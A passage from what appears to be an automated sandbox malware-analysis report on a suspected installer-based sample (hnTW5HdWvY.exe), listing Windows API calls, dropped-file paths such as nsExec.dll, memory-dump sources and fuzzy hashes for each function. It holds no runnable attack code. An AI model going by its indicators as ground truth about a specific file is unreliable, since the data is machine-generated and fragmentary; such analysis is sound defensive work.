                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: TextWindow
                                                                          • String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$1033$Profiling Setup
                                                                          • API String ID: 530164218-2471716629
                                                                          • Opcode ID: dea4c58fa3443a67bbec645ebc440ad5ee741145256fcc04d26135353b68e111
                                                                          • Instruction ID: 7f85c913c4ad4b2c7e28f7c5eb066f69db857395fa0ea2f0da5054c576734154
                                                                          • Opcode Fuzzy Hash: dea4c58fa3443a67bbec645ebc440ad5ee741145256fcc04d26135353b68e111
                                                                          • Instruction Fuzzy Hash: 461104B5B006109FD320AF15DC809373BACEBC6356728827BE801A73E0C77DAD028B58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405610
                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405619
                                                                          • lstrcatA.KERNEL32(?,00409014), ref: 0040562A
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040560A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2659869361-3081826266
                                                                          • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                          • Instruction ID: f0a200e34b5deac35b36b8c3e513a2bba311d5b4005e9f4ea20cd842f48867ab
                                                                          • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                          • Instruction Fuzzy Hash: 16D0A962605D302AD2022615AC0AE8B7A68CF06305B040422F200B62A3C63C2D418BFE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                          • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                            • Part of subcall function 00405AD8: wsprintfA.USER32 ref: 00405AE5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                          • String ID:
                                                                          • API String ID: 1404258612-0
                                                                          • Opcode ID: 57426068bb78e7fc12ff25959f7bd679cb8cd8833ff19df23162cb9bd9f4a020
                                                                          • Instruction ID: cf871c65d4e4f3ee9653570a57c4ed279446943cd2c239248b6b376061a1ea1e
                                                                          • Opcode Fuzzy Hash: 57426068bb78e7fc12ff25959f7bd679cb8cd8833ff19df23162cb9bd9f4a020
                                                                          • Instruction Fuzzy Hash: 3F115AB2900108BEDB01AFA5D881DEEBBB9EF04344F10807AF505F21A1E7789A54DB28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CharNextA.USER32(?,?,pivot\drukmaases.kin,?,0040570F,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004056B1
                                                                          • CharNextA.USER32(00000000), ref: 004056B6
                                                                          • CharNextA.USER32(00000000), ref: 004056CA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext
                                                                          • String ID: pivot\drukmaases.kin
                                                                          • API String ID: 3213498283-360973136
                                                                          • Opcode ID: b743ab26e54571032f58e362f9be0a160f4e35464d45215ae3ba9b7d85bee3d6
                                                                          • Instruction ID: a5f0db424de3ece2f93da8fa8465ac66cd1a9633bcd5b70ea5e8f5e09e52a010
                                                                          • Opcode Fuzzy Hash: b743ab26e54571032f58e362f9be0a160f4e35464d45215ae3ba9b7d85bee3d6
                                                                          • Instruction Fuzzy Hash: 04F0C251D04F602BFB3256240C54B775FACCB55360F980867E648662D2C6BE4C419FAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000,00000000,00402DA7,00000001), ref: 00402BDA
                                                                          • GetTickCount.KERNEL32 ref: 00402BF8
                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B44,00000000), ref: 00402C15
                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C23
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                          • String ID:
                                                                          • API String ID: 2102729457-0
                                                                          • Opcode ID: edb15b2a557076f8163c7a3e93653ceb388576ec72b14a846b112ddb74d149d0
                                                                          • Instruction ID: 21b079e0603347407b0e8bea5ce89a635a222a91f4c3b4b14634b7546a67a8fd
                                                                          • Opcode Fuzzy Hash: edb15b2a557076f8163c7a3e93653ceb388576ec72b14a846b112ddb74d149d0
                                                                          • Instruction Fuzzy Hash: 7BF03A3080A620BFC6526F24BE4DA8F7B64EB05B52B504866F104B51A4D778A8828BEC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 00404E08
                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404E59
                                                                            • Part of subcall function 00403EB4: SendMessageA.USER32(00010468,00000000,00000000,00000000), ref: 00403EC6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID:
                                                                          • API String ID: 3748168415-3916222277
                                                                          • Opcode ID: 5ed24ab9ef33d489e1b468578e452bb34f2c3a50ff0390caf4459e3fa9b2335e
                                                                          • Instruction ID: 160e060997078783acc2d08be4eebd9c773d2cb3c3e72dd3afa02660fee5d696
                                                                          • Opcode Fuzzy Hash: 5ed24ab9ef33d489e1b468578e452bb34f2c3a50ff0390caf4459e3fa9b2335e
                                                                          • Instruction Fuzzy Hash: 7E0171B1100248AFDF219F11DD84A9B3B2AFBC4715F104037FB04762E1C3399C5296AA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 004024F1
                                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,?,?,00000000,00000011), ref: 00402510
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll, xrefs: 004024DF, 00402504
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: FileWritelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll
                                                                          • API String ID: 427699356-3517045108
                                                                          • Opcode ID: 331d61a22114231173238dbc38848ac129e5b24e8850ffeb9f8ee4d8dade2d0f
                                                                          • Instruction ID: 99ee78c1eccbef78809478a7420901dcf2550f89e1355c3fa2d0585c42f5b742
                                                                          • Opcode Fuzzy Hash: 331d61a22114231173238dbc38848ac129e5b24e8850ffeb9f8ee4d8dade2d0f
                                                                          • Instruction Fuzzy Hash: E2F0E972A44244EFDB40EBB08E4A9EF3268DB01304F10443FB141F61C2D5FC4941A76E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3410,00403546,0040338A,?), ref: 00403588
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040358F
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403580
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Free$GlobalLibrary
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 1100898210-3081826266
                                                                          • Opcode ID: 3009e9edeeaf225471aa20a49794f7f9debd27987f3a1fde2fe5324fb2cef97b
                                                                          • Instruction ID: c435f3d6a1630fa5b517ded6fe9ed7dc0ebc24c208808f32919fc3bc69cf13a8
                                                                          • Opcode Fuzzy Hash: 3009e9edeeaf225471aa20a49794f7f9debd27987f3a1fde2fe5324fb2cef97b
                                                                          • Instruction Fuzzy Hash: EBE08C32844120ABC6216FA4EC0871AB7686B58B22F06842BEC017B2B0837C2D424B98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C97,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hnTW5HdWvY.exe,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 00405657
                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C97,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hnTW5HdWvY.exe,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 00405665
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrlen
                                                                          • String ID: C:\Users\user\Desktop
                                                                          • API String ID: 2709904686-224404859
                                                                          • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                                          • Instruction ID: 7d1453c19011f5abfc5d5d617c6b663c4d95b5fcfd1fb09af13cacd58312ca43
                                                                          • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                                          • Instruction Fuzzy Hash: 78D0A762409D702EE30363109C04B8F7A58CF12300F4904A2E080E6195C6791D414BAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,?,00000000,00000000,?,?,1000129F,00000000,/TIMEOUT=,00000000), ref: 1000180C
                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 10001824
                                                                          • CharNextA.USER32(?,?,?,1000129F,00000000,/TIMEOUT=,00000000), ref: 10001835
                                                                          • lstrlenA.KERNEL32(?,?,?,1000129F,00000000,/TIMEOUT=,00000000), ref: 1000183E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1660349596.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.1660317252.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660367794.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660387960.0000000010003000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660407195.0000000010004000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: 910ea4aa531fe9bf27a28eac16cc488e500561e24c713f869ebd536bab5d5233
                                                                          • Instruction ID: 7f82a7291824057eacc5956e7a05f4c8d228b72dba14fabd960d24b7c05b1b03
                                                                          • Opcode Fuzzy Hash: 910ea4aa531fe9bf27a28eac16cc488e500561e24c713f869ebd536bab5d5233
